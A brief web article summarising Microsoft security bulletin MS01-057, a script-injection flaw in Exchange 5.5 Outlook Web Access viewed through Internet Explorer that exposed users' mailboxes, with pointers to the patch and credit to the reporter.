|
A vulnerability exists
in the Microsoft Exchange Server 5.5 Outlook
Web Access (OWA) service that lets an attacker take any action
on the user’s mailbox that the user can take, including deleting,
moving and sending messages. The way OWA handles inline script message
used in conjunction with Internet Explorer (IE) created a loophole for
malicious users. The attacker is able to execute scripts that allow the
attacker access to the user's mailbox. Prior to the released patch, OWA
does not filter out scripts embedded in the message, the patch corrects
this problem by stripping the scripts before sending it to IE.
This vulnerability
only affects OWA used with IE and such scripts will not work on Outlook
client or Outlook Express. Non-IE browsers are also not affected, according
to Microsoft.
Lex Arquette of WhiteHat
Security is credited for reporting this issue to Microsoft.
For more details,
go to Microsoft
Security Bulletin MS01-057.
For patches, go to
Exchange
5.5 Web Client Hotfix 2655.77
Did you find this
article useful? Do you want to see more of this kind or something else?
I would really appreciate your comments, feel free to email
me!
<<
go back my previous article about Outlook Synchronization for Offline
Users
<<
go back my main page
<<
go back to outlookexchange.com
|
